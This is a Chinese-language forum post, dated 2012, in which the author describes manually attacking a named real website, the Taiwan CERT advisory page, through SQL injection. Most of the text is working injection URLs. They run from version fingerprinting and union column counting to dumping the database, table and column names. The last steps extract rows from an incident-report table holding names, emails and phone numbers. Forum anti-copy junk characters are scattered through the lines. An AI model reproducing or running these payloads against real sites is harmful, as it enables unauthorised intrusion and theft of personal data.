1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询$ }3 Z" f$ ~+ n+ N- ?1 ^0 J- b7 u( @
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解+ b- u- W1 L* D3 _& Z! l! U5 }
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--! X& `& [4 q4 a1 B
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
, M# `. s5 V) }' a3 V: I数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。! z- b) u( \6 P( x( n
4.判断有没有写权限' O0 V' n, e( E: ~/ P, Z+ H' f; V0 D
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限: D% _$ o N$ w# f. {
没办法,手动猜表啦
@. l/ z# X6 e4 k1 ?, B% ~5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
7 }: T, y( ?8 U3 i7 C但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下- I2 D+ u# o' Y& ^+ w: Q F" g
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
! X% _- P; x# o5 H3 R9 @; t成功查出所有数据库,国外的黑客就是不一般。数据库如下:/ a. h& P. F7 @
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb0 Y, _" {. n9 {
6.爆表,爆的是twcert库
' |2 P4 {- d# Z9 }4 Y3 _' C, zhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
. p; z' D' ]. S: b爆出如下表4 q+ d. z! D1 I: o' i1 k' J7 N
downloadfile,irsys,newsdata,secrpt,secrpt_big55 W+ L# e# g b# w1 ?" ~+ r
7.爆列名,这次爆的是irsys表
W% f& K4 G+ nhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--" n6 G) M$ @7 C
爆出如下列5 @5 y4 \6 B5 ?: J/ b8 V$ R, b
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
9 [9 Z7 e7 D1 H' F+ Y/ M( \8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
! U/ ~; ]' O0 n1 \! z2 Khttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--% G$ B& l; n& w9 z, r
返回是3,说明每个列里有3个地段
/ J1 b, @# M+ f" G9.爆字段内容
* C- p8 |7 K; D+ a6 hhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
, U9 q" y" u! ^- y. e9 ^+ r爆出name列的第一个字段的内容3 a- ]) b v: m- V
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--; A) ^, w i: n( C+ S! _2 x
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对